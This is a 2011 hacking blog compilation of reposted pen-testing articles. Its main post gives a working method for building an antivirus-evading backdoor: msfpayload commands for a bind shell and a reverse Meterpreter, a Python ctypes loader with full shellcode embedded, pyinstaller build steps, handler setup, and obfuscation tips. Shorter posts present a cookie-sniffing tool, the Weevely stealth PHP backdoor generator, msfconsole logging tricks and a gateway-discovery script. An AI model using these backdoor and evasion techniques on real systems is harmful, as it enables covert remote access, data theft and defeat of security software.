Oct 14, 2011

Create Backdoor With Evading Antivirus

If you want to see full detail, please go to the Source.

TIP #1: Do your reconnaissance. Know what antivirus software target system personnel are running. While it is certainly possible to make a backdoor that evades all antivirus software products, there is no need to waste those cycles if your target is only running one product, a significant likelihood. Narrow down your options by getting this information from target system personnel by asking, looking for information leakage such as e-mails footers that proclaim the AV product, or even a friendly social engineering phone call if such interaction is allowed in your rules of engagement.

TIP #2: If you want to use your backdoor for more than one project, do not submit it to virustotal.com or any of the other online sandboxes/scanner that work with antivirus software companies to generate new signatures. Instead, buy a copy of the antivirus product used by your target organization and test it on your own systems. Alternatively if your target is using one of the nine AV products scanned by VirusNoThanks, you could use http://vscan.novirusthanks.org/ and be sure to select "Do no distribute the sample" at the bottom of the page.

TIP #3: KISS — Keep it simple, shell-boy. I'm a minimalist when it comes to remote access. I just need enough to get in, disable antivirus (if the rules of engagement will allow it), and then move in with more full-featured tools. This approach requires less coding on my part and there is less of a chance that I will incorporate something that antivirus doesn't like.

TIP #4: You don't have to COMPLETELY reinvent this wheel. Metasploit has templates in the data/templates/src directory for DLLs, EXEs, and Windows Services. Start with them and modify them only as required to avoid your target's defenses. For example:
$ cat data/templates/src/pe/exe/template.c

#define SCSIZE 4096
char payload[SCSIZE] = "PAYLOAD:";

char comment[512] = "";
int main(int argc, char **argv) {
        (*(void (*)()) payload)();

You can set the payload[SCSIZE] array to any shell code that meets your needs and compile it. There are plenty of options out there for shell code. You can get several examples of shell code from exploit-db (http://www.exploit-db.com/shellcode/) and many of them do not trigger antivirus software. Or, you can also use msfpayload or msfvenom from Metasploit to generate C shell code and plug that into the template. For example:

$ ./msfpayload windows/shell_bind_tcp C

This generates C shell code to bind a shell to TCP port 4444. Compile it, and check to see if the AV product running in your lab detects it. If the compiled program is detected, you have a lot of flexibility in source code. You can try:

- Moving part of your shell code to a different data segment

- Compile it to different PE, Old EXE, or COM (yes... I said .COM) formats

- Break the shell code up into smaller strings and mix the order in the source code. Then reassemble it into a variable in memory in the correct order before calling it

- Use timed events or wait() functions to delay the payload execution to avoid heuristic engines

- Create your own simple encoding engine to mask the bytes... it is easier than you think! Check out http://www.cprogramming.com/tutorial/xor.html

I like writing in Python, then using pyinstaller to create an exe out of my Python script. Here is a Python template I wrote that does the same thing as the C template provided with Metasploit:
from ctypes import *
shellcode = ''

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

If you want to use a Metasploit payload as your shell code, you can easily turn C source into a Python-compatible string by deleting all the double quotes and new lines using the handy tr command as follows:

$ ./msfpayload windows/shell_bind_tcp C | tr —d '"' | tr —d '\n'

If you generate a multi-stage payload, just grab the string for stage one. For example, to create a Metasploit framework reverse Meterpreter, I would do the following:

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST= C | tr -d '"' | tr -d '\n' | more

Then grab the string produced for STAGE1 and plug it into my template as follows:

from ctypes import *
shellcode = '\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3'

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

Next, I'll compile my new backdoor with pyinstaller with the following options:

$ python configure.py
$ python makespec.py --onefile --noconsole shell_template.py
$ python build.py shell_template\shell_template.spec

To use the new payload we setup the Metasploit framework with the multi-handler "exploit". Once our program is run on the target, it connects back to the framework where stage2 is delivered.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST LHOST =>
msf exploit(handler) > exploit

Source: http://pen-testing.sans.org/blog/2011/10/13/tips-for-evading-anti-virus-during-pen-testing


If you like my blog, Please Donate Me

Oct 10, 2011

WebCookiesSniffer - New cookies sniffer/viewer utility

WebCookiesSniffer is a new packet sniffer utility that captures all web site cookies sent between the web browser and the web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

Except of a capture driver needed for capturing network packets, WebCookiesSniffer doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - WebCookiesSniffer.exe

After running WebCookiesSniffer in the first time, the 'Capture Options' window appears on the screen, and you're asked to choose the capture method and the desired network adapter. The next time you use WebCookiesSniffer, it'll automatically start capturing packets with the capture method and the network adapter that you previously selected. You can always change the 'Capture Options' again by pressing F9. After choosing the capture method and network adapter, WebCookiesSniffer captures and displays every cookie found in the data sent between your web browser and the remote web server.

Source: http://thehackernews.com/2011/10/webcookiessniffer-new-cookies.html

If you like my blog, Please Donate Me

MSFConsole Prompt Fiddling

Metasploit has multiple ways of creating logs:
cat ~/.msf4/logs/framework.log       This log automatically logs all of the error data that is great for trouble shooting when something is working, but doesn't record what you are doing inside of msfconsole
msf> spool ~/myclient.log The spool command is great for logging output from anything you do in either consoles or sessions, even when you drop to a shell. My one gripe about this one is that it doesn't log the actual command you issued.
msf> set ConsoleLogging true
msf> set LogLevel 5
msf> set SessionLogging true
msf> set TimestampOutput true 
These combined essentially do the same thing as spool except that they go into different logs, but do actually log the command you issued

Plenty of logging right? But none of them really 'log everything' and time stamps are not a regular occurrence in them. Cool, but we need both. We've got the 'log everything' with the Linux 'script' command, we just need a way to inject time stamps into our log.

Enter the ever mutable 'msf>' prompt:

A lesser known variable in MSFConsole is 'PROMPT'. You can set this pretty much like any other OS can, however there are some metasploit specific things you can add. Using a three letter abbreviation you can even add color to it. 

For example lets add our hostname to our prompt:

  • set PROMPT %H
changes msf> to myattackmachine>
And you can combine and add things that you wish:

  • set PROMPT %H Just more text %U
changes the prompt to:  myattackmachine Just more text mubix>  (%U is username)
For reference here are the other working % variables that I know of:

  • %D = Current local directory (not sure if this changes when in meterpreter or not for the victims dir, that would be cool)
  • %H = Host name (again, would be cool if this changed when in meterpreter)
  • %J = Current number of jobs running
  • %L = Local IP (makes it easy to remember what to put in LHOST)
  • %S = Currently number of sessions open
  • %T = Time stamp
  • %U = Username (yes, would be awesome if this changed in meterpreter too)
Now if you wanted to add colors to that, all you would do is use something like %grn%T to make the time stamp green. You'll have to play around with the color's names as I don't know them all. %red %blu %blk etc...
Combine all of that with script and you've got something awesome. I set my PROMPT to:

  • set PROMPT %T S:%S J:%J
  • 1970-01-01 00:00:00 +0000 S:0 J:0>

Source: http://www.room362.com/blog/2011/10/9/msfconsole-prompt-fiddling.html

If you like my blog, Please Donate Me

Weevely create and manage PHP trojan designed to be hardly detectable

This software is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions.


Select All Code:
root@bt:/weevely# ./main.py  -h
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/
Usage: main.py [options]
  -h, --help            show this help message and exit
  -g, --generate        Generate backdoor crypted code, requires -o and -p .
  -o OUTPUT, --output=OUTPUT
                        Output filename for generated backdoor .
  -c COMMAND, --command=COMMAND
                        Execute a single command and exit, requires -u and -p
  -t, --terminal        Start a terminal-like session, requires -u and -p .
  -C CLUSTER, --cluster=CLUSTER
                        Start in cluster mode reading items from the give
                        file, in the form 'label,url,password' where label is
  -p PASSWORD, --password=PASSWORD
                        Password of the encrypted backdoor .
  -u URL, --url=URL     Remote backdoor URL .

Source: https://code.google.com/p/weevely/

If you like my blog, Please Donate Me

Gateway-finder [ Scapy Script find Gateway IP in the LAN]

Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.

This can be useful during Internal pentests when you want to quickly check for unauthorised routes to the Internet (e.g. rogue wireless access points) or routes to other Internal LANs.  It doesn't perform a hugely thorough check, but it is quick at least.  It's python, so it should be easy to modify to fit your needs.

[ Overview ]

You give the script the IP address of a system on the Internet you're trying to reach and it will send the following probes via each system on the local LAN:

* An ICMP Ping
* A TCP SYN packet to port 80
* An ICMP Ping with a TTL of 1
* A TCP SYN packet to port 80 with a TTL of 1

It will report separately which systems send an ICMP "TTL exceeded in transit" message back (indicating that they're routers) and which respond to the probe (indicating that they're gateways to the Internet).

[ Dependencies ]

Python and Scapy.  On Debian / Ubuntu you should just need to do this:

# apt-get install python-scapy

[ Usage ]

# python gateway-finder.py -h
WARNING: No route found for IPv6 destination :: (no default route?)
Usage: gateway-finder.py [ -I interface ] -i ip -f macs.txt

Tries to find a layer-3 gateway to the Internet.  Attempts to reach an IP
address using ICMP ping and TCP SYN to port 80 via each potential gateway
in macs.txt (ARP scan to find MACs)

  -h, --help            show this help message and exit
  -i IP, --ip=IP        Internet IP to probe
  -v, --verbose         Verbose output
                        Network interface to use
  -f MACFILE, --macfil=MACFILE
                        File containing MAC addresses

[ Step 1: Run an ARP scan to identify systems on the local LAN ]

Use your favourite ARP scanning to identify systems on the local LAN. Save the output (I use to arp.txt in the example below).

# arp-scan -l | tee arp.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)     00:13:72:09:ad:76       Dell Inc.     00:90:27:43:c0:57       INTEL CORPORATION     00:08:74:c0:40:ce       Dell Computer Corp.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 256 hosts scanned in 2.099 seconds (121.96 hosts/sec).  3 responded

[ Step 2: Run gateway-finder on the list of local systems ]

Gateway-finder needs two bits of input from you:
* The MAC addresses of the potential gateways
* The IP address of a system on the Internet (I use a google.com address in the example below):

If arp.txt also contains an IP of each system on the same line as the MAC, you'll get much nicer output.  If you need to use a different network interfaces, use the -I option.

# python gateway-finder.py -f arp.txt -i
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder

[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in arp.txt
[+] 00:13:72:09:AD:76 [] appears to route ICMP Ping packets to  Received ICMP TTL Exceeded in transit response.
[+] 00:13:72:09:AD:76 [] appears to route TCP packets  Received ICMP TTL Exceeded in transit response.
[+] We can ping via 00:13:72:09:AD:76 []
[+] We can reach TCP port 80 on via 00:13:72:09:AD:76 []
[+] Done
Source: https://github.com/pentestmonkey/gateway-finder 

If you like my blog, Please Donate Me